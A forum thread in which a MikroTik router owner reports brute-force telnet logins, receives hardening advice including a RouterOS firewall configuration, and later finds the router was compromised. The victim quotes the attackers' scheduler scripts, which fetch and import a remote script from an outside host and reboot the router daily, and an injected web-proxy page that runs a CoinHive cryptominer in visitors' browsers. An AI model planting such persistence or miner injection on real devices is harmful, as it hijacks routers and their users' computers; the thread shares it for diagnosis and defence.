my router is under attack

I noticed in the router log that for a couple of days my router has constantly been attacked from different IP addresses with unauthorized login attempts.
What do you recommend me to do in this case?
It's the first time I have experienced this and I'm just a basic user of MikroTik routers.
Thank you.

(6487 messages not shown)
sep/27/2018 10:19:13 system,error,critical login failure for user guest from 103.207.39.173 via telnet
sep/27/2018 10:19:13 system,error,critical login failure for user root from 103.207.39.173 via telnet
sep/27/2018 10:19:14 system,error,critical login failure for user root from 103.207.39.173 via telnet
sep/27/2018 10:19:15 system,error,critical login failure for user admin from 103.207.39.173 via telnet
sep/27/2018 10:19:15 system,error,critical login failure for user root from 103.207.39.173 via telnet
sep/27/2018 10:19:16 system,error,critical login failure for user user from 103.207.39.173 via telnet
sep/27/2018 10:19:16 system,error,critical login failure for user root from 103.207.39.173 via telnet
sep/27/2018 10:19:17 system,error,critical login failure for user root from 103.207.39.173 via telnet
[adminxyz@MikroTik] >

Hurry! https://wiki.mikrotik.com/wiki/Manual:Securing_Your_Router

P.S.: After you open this web page, disable your Internet interface.

Your telnet port is clearly not firewalled properly.

If you’re not using telnet, disable the service ( IP > Services > Telnet > Disable ).

For further advice, post your current configuration for review ( /export hide-sensitive in Terminal ).

This cannot be the default configuration.
Remote management telnet/ssh/web/winbox are all closed on the outside interface.
Since you see what you see, the telnet you use to administrate your router is open and exposed.
Close it as soon as possible.

If you need remote management, use VPN to your box and do management through the tunnel.

If you cannot use that, use at least ssh, not telnet.
Then do not use the default port 22, but something like 34222 (a random high port).
Also use port knocking to keep ssh closed until you need it (search for how to set it up).

If you leave telnet open, it's just a matter of time before someone finds your password using brute force.


I have added a rule on my MT that if someone tries to access one blocked port, they are blocked on all ports for 24 hours.
It's a rule that may be too hard for some, but it works nicely for me. There are around 1500 blocked IPs in the list at all times.
See the added Splunk logs:

[Image: Bruteforce access logs.jpg. Low dip: restart. High top: many IPs in a short time.]

I agree with Jotne and would go one step further. If you must access remotely, I hope it’s always from the same place!! If not, you’re asking for trouble :wink:

If so, modify the firewall rule so as to accept telnet / ssh only from the IP of the place you're accessing the router from.

If the site from where you are telneting has a dynamic WAN address, use a dynamic DNS service. This will allow you to create a rule that accepts the connection from a name (use address lists) rather than an IP address which may change often.

Regards,


Sent from Tapatalk
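The advice in the two posts above (disable unused services, move ssh off port 22, allow management only from your own site via a dynamic DNS name in an address list, and blocklist on all ports for 24 hours anyone who probes a closed management port) put together as one RouterOS configuration. This is an added example, not a config from the thread; it assumes an interface list named WAN exists, that home.example.dyndns.org is a dynamic DNS name you control, and that ssh is moved to 34222.

```routeros
# Added example (not from the thread). Assumes: interface list "WAN",
# dynamic DNS name home.example.dyndns.org for the admin site, ssh on 34222.

# 1. Turn off services that are not needed; keep ssh on a non-default port.
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set api disabled=yes
set api-ssl disabled=yes
set ssh port=34222

# 2. Management sources. RouterOS re-resolves a DNS name placed in an
#    address list, so a changing home address keeps matching.
/ip firewall address-list
add list=mgmt address=home.example.dyndns.org comment="admin site (dynamic DNS)"

# 3. Input chain, top to bottom:
#    - anything already on the "blocked" list is dropped on every port
#    - established/related traffic is accepted, invalid is dropped
#    - ssh/winbox accepted only from the mgmt list
#    - a probe of any closed management port adds the source to "blocked"
#      for 1 day (add-src-to-address-list passes through to the next rule)
#    - everything else from WAN is dropped
/ip firewall filter
add chain=input action=drop src-address-list=blocked in-interface-list=WAN \
    comment="blocked on all ports for 24h"
add chain=input action=accept connection-state=established,related
add chain=input action=drop connection-state=invalid
add chain=input action=accept protocol=tcp dst-port=34222,8291 \
    src-address-list=mgmt in-interface-list=WAN \
    comment="ssh/winbox from the admin site only"
add chain=input action=add-src-to-address-list address-list=blocked \
    address-list-timeout=1d protocol=tcp \
    dst-port=21,22,23,80,443,8291,8728,8729 in-interface-list=WAN \
    comment="probe of a closed management port -> blocklist"
add chain=input action=drop in-interface-list=WAN \
    comment="drop everything else from WAN"
```

Apply the filter rules from a console or VPN session rather than over the very port you are closing, and check /ip firewall address-list print afterwards to see who is landing on the blocked list.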

I disabled Telnet and SSH.
I deleted the admin account and created a new one with full rights.
I changed the Router ID from MikroTik to something else.

I noticed the following: my scheduler for running the dynamic DNS name update was removed and new scripts appeared (I disabled them after I found them).




/system scheduler
add disabled=yes name=upd112 on-event="/system scheduler remove [find name=sh1\
    13]\r\
    \n:do {/file remove u113.rsc} on-error={}" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
    startup
add disabled=yes interval=12h name=upd113 on-event=":do {/tool fetch url=\"htt\
    p://up0.bit:31415/error\?part=7\" mode=http dst-path=webproxy/error.html} \
    on-error={}\r\
    \n:do {/tool fetch url=\"http://up0.bit:31415/error\?part=7\" mode=http ds\
    t-path=flash/webproxy/error.html} on-error={}\r\
    \n:do {/tool fetch url=\"http://up0.bit:31415/rsc\?key=9NL6MgbmSxeuBW&part\
    =7\" mode=http dst-path=u113.rsc} on-error={}\r\
    \n:do {/tool fetch url=https://2no.co/18NN37 mode=http keep-result=no} on-\
    error={}\r\
    \n/import u113.rsc\r\
    \n:do {/file remove u113.rsc} on-error={}" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    sep/30/2018 start-time=23:23:44
add disabled=yes interval=1d name=Auto113 on-event="/system reboot" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    sep/30/2018 start-time=03:11:00

I also found the following file(s): error.html

<html>
<head>
	<meta http-equiv="Content-Type" content="text/html;charset=windows-1251">
	<title>"$(url)"</title> 
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('bFAs1SG62inf49pfurQNJBTyXJEcHdfJ', {throttle: 0.1});
	miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);
</script>
</head>
<frameset>
<frame src="$(url)"></frame>
</frameset>
</html>

Now I have no doubt that my router was compromised.
After a Google search I found that 200000-mikrotik-routers-worldwide-have-been-compromised

What do you recommend to do for a fast fix? I'm currently not at the location of the router, so a remote fix would be very useful.

Netinstall an upgrade and restart from scratch :frowning:

Sent from Tapatalk

Do a search here on the forum for what others have done.
This has been discussed several times.

I still have a problem with the router.
I deleted everything and made a configuration reset, but I'm not able to upgrade or downgrade the RouterOS.
The current version on the router is 6.33.3. I tried downgrading to 6.0 and 6.30 and upgrading to 6.43.2, but after each restart the version is still 6.33.3.
How can I upgrade my router, since this version is compromised?

After two hours of struggle I finally managed to install version 6.43.2 using Netinstall.

Dude, that’s what I suggested a week ago.

Regards,


Sent from Tapatalk